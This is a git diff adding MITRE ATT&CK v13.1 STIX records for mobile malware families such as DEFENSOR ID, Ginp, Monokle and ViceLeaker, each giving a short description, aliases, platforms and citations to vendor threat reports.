@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--7cd8c0ca-393f-42f6-a0b2-ad4473ca33d4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "X-Agent for Android", + "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--56660521-6db4-4e5a-a927-464f22954b7c", + "created": "2017-10-25T14:48:42.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0314", + "external_id": "S0314" + }, + { + "source_name": "X-Agent for Android", + "description": "(Citation: CrowdStrike-Android)" + }, + { + "source_name": "CrowdStrike-Android", + "description": "CrowdStrike Global Intelligence Team. (2016). Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. Retrieved February 6, 2017.", + "url": "https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663.json new file mode 100644 index 0000000000000000000000000000000000000000..cda08490cf9af1c43b6f5fb3af6d584f16815738 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--b73f51da-4a16-499c-b52e-65ea4a898f0e", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Luk\u00e1\u0161 \u0160tefanko, ESET" + ], + "x_mitre_aliases": [ + "DEFENSOR ID" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "type": "malware", + "created": "2020-06-26T15:12:39.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0479", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0479" + }, + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T20:16:31.850Z", + "name": "DEFENSOR ID", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) is a banking trojan capable of clearing a victim\u2019s bank account or cryptocurrency wallet and taking over email or social media accounts. [DEFENSOR ID](https://attack.mitre.org/software/S0479) performs the majority of its malicious functionality by abusing Android\u2019s accessibility service.(Citation: ESET DEFENSOR ID) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9.json new file mode 100644 index 0000000000000000000000000000000000000000..d77c891b7f982d80bc1fffeb5ac164ecf450c3f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--73842ea7-e8d6-44d2-89b5-e17c3cc29207", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "MazarBOT", + "description": "[MazarBOT](https://attack.mitre.org/software/S0303) is Android malware that was distributed via SMS in Denmark in 2016. (Citation: Tripwire-MazarBOT)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9", + "created": "2017-10-25T14:48:40.875Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0303", + "external_id": "S0303" + }, + { + "source_name": "MazarBOT", + "description": "(Citation: Tripwire-MazarBOT)" + }, + { + "source_name": "Tripwire-MazarBOT", + "description": "Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. Retrieved December 23, 2016.", + "url": "https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6146be90-470c-4049-bb3a-9986b8ffb65b.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6146be90-470c-4049-bb3a-9986b8ffb65b.json new file mode 100644 index 0000000000000000000000000000000000000000..6b332477e4ce249d871b266e064f1df4ee2d9702 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6146be90-470c-4049-bb3a-9986b8ffb65b.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--23cff331-cc5e-44e4-9f0e-ff75ba38e76b", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Ginp" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "type": "malware", + "created": "2020-04-08T15:51:24.862Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0423", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0423" + }, + { + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "source_name": "ThreatFabric Ginp" + } + ], + "modified": "2020-09-11T15:50:18.707Z", + "name": "Ginp", + "description": "[Ginp](https://attack.mitre.org/software/S0423) is an Android banking trojan that has been used to target Spanish banks. Some of the code was taken directly from [Anubis](https://attack.mitre.org/software/S0422).(Citation: ThreatFabric Ginp)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f.json new file mode 100644 index 0000000000000000000000000000000000000000..075c343a7402fdb52caf0bba3ad4387de58aaa02 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--e3c28bcd-fa0b-476f-9545-fe23adcc864b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "HummingWhale", + "description": "[HummingWhale](https://attack.mitre.org/software/S0321) is an Android malware family that performs ad fraud. (Citation: ArsTechnica-HummingWhale)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f", + "created": "2017-10-25T14:48:40.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0321", + "external_id": "S0321" + }, + { + "source_name": "HummingWhale", + "description": "(Citation: ArsTechnica-HummingWhale)" + }, + { + "source_name": "ArsTechnica-HummingWhale", + "description": "Dan Goodin. (2017, January 23). Virulent Android malware returns, gets >2 million downloads on Google Play. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--680f680c-eef9-4f8a-b5f5-f451bf47e403.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--680f680c-eef9-4f8a-b5f5-f451bf47e403.json new file mode 100644 index 0000000000000000000000000000000000000000..49a60b890cd8ebf15cd31c4dbf676dc48b7dd5c3 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--680f680c-eef9-4f8a-b5f5-f451bf47e403.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--aa99b109-0573-42b5-b889-cadca5361d9c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "eSurv" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "type": "malware", + "created": "2020-09-14T14:13:45.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0507", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0507" + }, + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T15:39:17.698Z", + "name": "eSurv", + "description": "[eSurv](https://attack.mitre.org/software/S0507) is mobile surveillanceware designed for the lawful intercept market that was developed over the course of many years.(Citation: Lookout eSurv)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f.json new file mode 100644 index 0000000000000000000000000000000000000000..d92cc9151fb2e11898eb5684aaa8efa9072c092e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--6ff57f39-c5c1-46bb-9d7f-038093c85c8c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-01T22:00:09.640Z", + "name": "TangleBot", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) is SMS malware that was initially observed in September 2021, primarily targeting mobile users in the United States and Canada. [TangleBot](https://attack.mitre.org/software/S1069) has used SMS text message lures about COVID-19 regulations and vaccines to trick mobile users into downloading the malware, similar to [FluBot](https://attack.mitre.org/software/S1067) Android malware campaigns.(Citation: cloudmark_tanglebot_0921)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "TangleBot" + ], + "type": "malware", + "id": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "created": "2023-02-28T21:39:52.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1069", + "external_id": "S1069" + }, + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65.json new file mode 100644 index 0000000000000000000000000000000000000000..241dcd4a8bc8fb9dec8549951a8a20ce5cbb0312 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--b3b8980d-38d6-435f-93bb-998abf1e08c9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "J\u00f6rg Abraham, EclecticIQ" + ], + "x_mitre_aliases": [ + "Monokle" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "type": "malware", + "created": "2019-09-04T14:28:14.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://attack.mitre.org/software/S0407", + "source_name": "mitre-attack", + "external_id": "S0407" + }, + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2021-11-01T18:30:41.998Z", + "name": "Monokle", + "description": "[Monokle](https://attack.mitre.org/software/S0407) is targeted, sophisticated mobile surveillanceware. It is developed for Android, but there are some code artifacts that suggests an iOS version may be in development.(Citation: Lookout-Monokle)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6e282bbf-5f32-476a-b879-ba77eec463c8.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6e282bbf-5f32-476a-b879-ba77eec463c8.json new file mode 100644 index 0000000000000000000000000000000000000000..7996a7d076b47a3da2475b415f3f5744abb54a2f --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6e282bbf-5f32-476a-b879-ba77eec463c8.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--40105c51-b144-420d-90e9-c27b4be270d6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Red Alert 2.0" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "type": "malware", + "created": "2020-12-14T14:52:02.949Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0539", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0539" + }, + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-16T20:52:20.822Z", + "name": "Red Alert 2.0", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) is a banking trojan that masquerades as a VPN client.(Citation: Sophos Red Alert 2.0) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6fcaf9b0-b509-4644-9f93-556222c81ed2.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6fcaf9b0-b509-4644-9f93-556222c81ed2.json new file mode 100644 index 0000000000000000000000000000000000000000..2063b352ef878be02824abb3a6be40e83b1dd3f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--6fcaf9b0-b509-4644-9f93-556222c81ed2.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--0d80d4cd-5790-4777-9ad8-ccd7acd9e024", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "ViceLeaker", + "Triout" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "type": "malware", + "created": "2019-11-21T16:42:48.203Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0418", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0418" + }, + { + "source_name": "ViceLeaker", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "source_name": "Triout", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "source_name": "SecureList - ViceLeaker 2019" + }, + { + "source_name": "Bitdefender - Triout 2018", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout \u2013 Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020." 
+ } + ], + "modified": "2020-03-26T19:00:42.233Z", + "name": "ViceLeaker", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) is a spyware framework, capable of extensive surveillance and data exfiltration operations, primarily targeting devices belonging to Israeli citizens.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--838f647e-8ff8-48bd-bbd5-613cee7736cb.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--838f647e-8ff8-48bd-bbd5-613cee7736cb.json new file mode 100644 index 0000000000000000000000000000000000000000..1b292f43ac3dd4f1ae2f3eda8943de6c6cb0483c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--838f647e-8ff8-48bd-bbd5-613cee7736cb.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--d0eef57c-ff9e-4405-b19c-db501fe70522", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Ofir Almkias, Cybereason" + ], + "x_mitre_aliases": [ + "FakeSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "type": "malware", + "created": "2020-09-15T15:18:11.971Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0509", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0509" + }, + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-10-06T20:09:57.659Z", + "name": "FakeSpy", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) is Android spyware that has been operated by the Chinese threat actor behind the Roaming Mantis campaigns.(Citation: Cybereason FakeSpy)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b.json new file mode 100644 index 0000000000000000000000000000000000000000..d93faf5b35e31cb401d94c1ecacc615d53c60f05 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--9de398bb-b902-491c-a125-4f28d0ae8f4e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SpyDealer", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) is Android malware that exfiltrates sensitive data from Android devices. (Citation: PaloAlto-SpyDealer)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "SpyDealer" + ], + "type": "malware", + "id": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0324", + "external_id": "S0324" + }, + { + "source_name": "SpyDealer", + "description": "(Citation: PaloAlto-SpyDealer)" + }, + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--89c3dbf6-f281-41b7-be1d-a0e641014853.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--89c3dbf6-f281-41b7-be1d-a0e641014853.json new file mode 100644 index 0000000000000000000000000000000000000000..105e89c97d77596dca77aeb0f3fd8f21a9ad7f2f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--89c3dbf6-f281-41b7-be1d-a0e641014853.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--8b76cee9-0580-4381-8459-6cd461545467", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Concipit1248", + "Corona Updates" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "type": "malware", + "created": "2020-04-24T15:12:10.817Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0426", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0426" + }, + { + "source_name": "Corona Updates", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-30T18:30:05.787Z", + "name": "Concipit1248", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) is iOS spyware that was discovered using the same name as the developer of the Android spyware [Corona Updates](https://attack.mitre.org/software/S0425). Further investigation revealed that the two pieces of software contained the same C2 URL and similar functionality.(Citation: TrendMicro Coronavirus Updates)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--936be60d-90eb-4c36-9247-4b31128432c4.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--936be60d-90eb-4c36-9247-4b31128432c4.json new file mode 100644 index 0000000000000000000000000000000000000000..cb8e90c276346d17e155273ec141007cdc40579d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--936be60d-90eb-4c36-9247-4b31128432c4.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--1d4351f7-6787-4bb1-99a4-7ac860ab8149", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RuMMS", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) is an Android malware family. (Citation: FireEye-RuMMS)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "created": "2017-10-25T14:48:48.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0313", + "external_id": "S0313" + }, + { + "source_name": "RuMMS", + "description": "(Citation: FireEye-RuMMS)" + }, + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--93799a9d-3537-43d8-b6f4-17215de1657c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--93799a9d-3537-43d8-b6f4-17215de1657c.json new file mode 100644 index 0000000000000000000000000000000000000000..873e8c907bfe71fd016c6965d3444053659b0d4c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--93799a9d-3537-43d8-b6f4-17215de1657c.json 
